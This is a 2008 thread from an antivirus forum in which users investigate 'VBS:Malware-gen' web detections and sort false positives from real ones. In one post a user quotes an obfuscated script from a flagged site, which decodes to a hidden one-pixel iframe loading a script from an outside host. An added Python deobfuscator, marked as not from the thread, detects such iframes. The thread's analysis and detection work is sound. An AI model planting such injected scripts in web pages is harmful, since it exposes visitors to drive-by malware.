Author Topic: VBS:Malware-gen  (Read 198665 times)


wyrmrider
Re: VBS:Malware-gen
« Reply #150 on: September 03, 2008, 07:24:59 PM »
How about copying them to the user section of the chest and also uploading to VirusTotal?
It would be nice to see how dangerous these hits are.

lukosanthropos
Looks as if we are making some progress - you lurking?

DavidR
Re: VBS:Malware-gen
« Reply #151 on: September 03, 2008, 08:30:29 PM »
As soon as you get the webshield warning, go to your temp directory; in the _avast4_ subdir you'll find the temporary files. You can copy them elsewhere and then let webshield delete them from the temp. One of the temp files would be that problematic page.

I tried what you suggested, even had the _avast_ sub directory open waiting, tried to log on and got the alert, left the alert window open and no unp files appeared for the alert by avast, even refreshed the folder but no files in that location.

Clicked Abort connection to close the alert window and no unp files were found. Did a search for unp*.tmp and found two (unrelated to this; ashMaiSv.exe created these), both in the windows\temp\_avast4_ folder, so it isn't using the folder avast created in C:\Documents and Settings\UserName\Local Settings\Temp\_avast4_ ???

So I'm out, can't capture even the unp files.

Edit: OK, tried again and managed to capture the unp file, will send it for analysis as a possible FP.
« Last Edit: September 03, 2008, 08:35:59 PM by DavidR »
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.6.6121 (build 24.6.9241.848) UI 1.0.809/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

kubecj
Re: VBS:Malware-gen
« Reply #152 on: September 03, 2008, 08:34:18 PM »
Strange. While the dialogue is open, the file should be in temp\_avast4_. Where your temp is located depends on your settings.

DavidR
Re: VBS:Malware-gen
« Reply #153 on: September 03, 2008, 08:49:48 PM »
For some reason there are two _avast4_ folders on my system. I was watching the wrong one the first time out; watching windows\temp\_avast4_ the second time, I was able to capture the file.

Update: uploaded the unp*.tmp file to VT and got 7/36 detections (includes GData); see http://www.virustotal.com/analisis/54cbd22b1a6bbe88fd4de3c0822a914a

There is a script tag that has what avast must think is suspect/malicious; see the code below.

Code:
<script type="text/javascript">
eval(unescape("%64%6F[deleted]%29%3B"));
</script>
« Last Edit: September 11, 2008, 12:16:15 PM by kubecj »

xenio
Re: VBS:Malware-gen
« Reply #154 on: September 11, 2008, 11:32:21 AM »
I am getting a virus warning of VBS:Malware-gen
on this web site: www.dinamobasket.com

but there is no encrypted JavaScript code in it.
Any idea?
Thanks

jsejtko
Re: VBS:Malware-gen
« Reply #155 on: September 11, 2008, 11:42:55 AM »
Hello,

detection of www.dinamobasket.com is a false positive and will be corrected in the next VPS update. Thanks for the information.

pedro1612
Re: VBS:Malware-gen
« Reply #156 on: September 27, 2008, 11:55:29 AM »
I'm getting a virus warning of "VBS:Malware-gen"
on all websites of *.freecoolsite.com

for example:

f.freecoolsite.com
prayudi.freecoolsite.com
homebased.freecoolsite.com
spidernet.freecoolsite.com

my version of VPS: 080926-0


Lisandro
Re: VBS:Malware-gen
« Reply #157 on: September 27, 2008, 02:52:32 PM »
I'm getting a virus warning of "VBS:Malware-gen"
on all websites of *.freecoolsite.com
Dr. Web returned clean, but I trust avast detection much more than it.
Maybe some obfuscated or encrypted script (malicious ???) could be in those pages.
The best things in life are free.

Casaboontha
Re: VBS:Malware-gen
« Reply #158 on: September 27, 2008, 03:32:57 PM »
Site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

DavidR
Re: VBS:Malware-gen
« Reply #159 on: September 27, 2008, 04:33:58 PM »
@ pedro1612
It certainly looks like an FP. I captured one page (Sign of "VBS:Malware-gen" has been found in "hXXp://f.freecoolsite.com/" file.) and uploaded it to VirusTotal, and effectively only avast detects anything.
See VT results: http://www.virustotal.com/analisis/0ab73679254a792a8d003af65677aa3f.

With the domain name followed by /" file, I don't know if avast is looking at one of the external links or the default page (which it seems to do, or it wouldn't alert on the page I captured).

I didn't see anything obvious in the page that would trigger the alert.

I have sent a sample to avast for further analysis.

Lisandro
Re: VBS:Malware-gen
« Reply #160 on: September 27, 2008, 05:13:55 PM »
It certainly looks like an FP
David, can you get hold of the code of that page and see if it is obfuscated or encrypted?
I really trust avast's website detections... it's quite improved compared to other antivirus products.

DavidR
Re: VBS:Malware-gen
« Reply #161 on: September 27, 2008, 05:36:06 PM »
It doesn't look like obfuscated or encrypted code; as I said, I can't see anything obvious (which, given my limited experience, isn't a certainty).

pedro1612
Re: VBS:Malware-gen
« Reply #162 on: September 27, 2008, 05:37:07 PM »
Thank you!!
Maybe it's something in the ads added automatically by a hosting provider... ?  ???

DavidR
Re: VBS:Malware-gen
« Reply #163 on: September 27, 2008, 05:50:55 PM »
Site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

I have had a look at this page and there are several batches of JavaScript that could be making avast alert, as the code appears obfuscated, and avast isn't alone in detecting something; see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b.

Like this:
Code:
<script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;';
 addy42235 = addy42235 + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 var addy_text42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;' + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 document.write( '<a ' + path + '\'' + prefix + ':' + addy42235 + '\'>' );
 document.write( addy_text42235 );
 document.write( '<\/a>' );
 //-->
</script>

I haven't enough experience to know what is trying to be achieved, but it isn't clear (JavaScript is a plain language) what is going on, and this 'could' be the reason.

This one especially looks very suspicious; I have broken down the single line of code (as it would be huge) into something easier to read.
Code:
<script type="text/javascript">
// converts a hex pair to its integer value (radix 16)
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}
// walks the argument two hex characters at a time, decodes each to a character
// and writes the resulting markup straight into the page
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return A22AFFBCBE863863A1B64DF;}
var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C
(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,
FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
// the single hex string, split with + so the broken-down copy stays valid
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7" +
"66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312" +
"06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70" +
"6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
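As an added example (not code from this thread or from avast), here is a static Python deobfuscator for the two snippets quoted in the post above: it decodes the quoted hex argument the same way the script's parseInt/fromCharCode loop would, without executing it, flags any iframe that is hidden or sized to a pixel, and resolves the entity-encoded mailto fragments to a readable address. The sample strings are rejoined from the post; the function names are my own.

```python
import html
import re

# Constructed sample: the hex argument quoted in the post above, rejoined
# into one string (the post split it across lines for readability).
HEX_ARG = (
    "3C696672616D65207372633D22687474703A2F2F7878786D6F7"
    "66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312"
    "06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70"
    "6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E"
)
SAMPLE_SCRIPT = 'EDC04E5FA7431499C99("' + HEX_ARG + '");'

# Constructed sample: the entity-encoded mailto fragments from the same post.
SAMPLE_MAILTO = (
    "var addy42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;';\n"
    "addy42235 = addy42235 + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';"
)


def decode_hex_calls(script):
    """Decode every quoted hex literal passed to a call, statically.
    Mirrors parseInt(substr(i, 2), 16) + String.fromCharCode, no eval."""
    decoded = []
    for m in re.finditer(r'\(\s*"([0-9A-Fa-f]{2,})"\s*\)', script):
        h = m.group(1)
        if len(h) % 2:          # odd length cannot be a byte string; skip it
            continue
        decoded.append(bytes.fromhex(h).decode("latin-1"))
    return decoded


def join_entity_strings(script):
    """Concatenate the single-quoted fragments and resolve HTML entities."""
    return html.unescape("".join(re.findall(r"'([^']*)'", script)))


# An iframe is suspicious when it is invisible or 0/1 pixel in either dimension.
HIDDEN = re.compile(
    r"visibility\s*:\s*hidden|(?:width|height)\s*=\s*[\"']?[01]\b", re.I)


def hidden_iframe_sources(markup):
    """Return the src of each iframe in the markup that matches HIDDEN."""
    srcs = []
    for tag in re.finditer(r"<iframe[^>]*>", markup, re.I):
        if HIDDEN.search(tag.group(0)):
            src = re.search(r"src\s*=\s*[\"']([^\"']+)", tag.group(0), re.I)
            srcs.append(src.group(1) if src else "")
    return srcs
```

Running it on the post's hex string yields a one-pixel, visibility:hidden iframe, which is the pattern a scanner would flag; the mailto snippet only yields a plain e-mail address.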

DavidR
Re: VBS:Malware-gen
« Reply #164 on: September 27, 2008, 05:54:16 PM »
Thank you!!
Maybe it's something in the ads added automatically by a hosting provider... ?  ???

You're welcome.

I have no idea if that might be the case, but there wasn't anything like that as far as I could tell; we will have to wait for avast to analyse it and correct the VPS if it is, as I suspect, an FP. They are usually quick to correct once identified.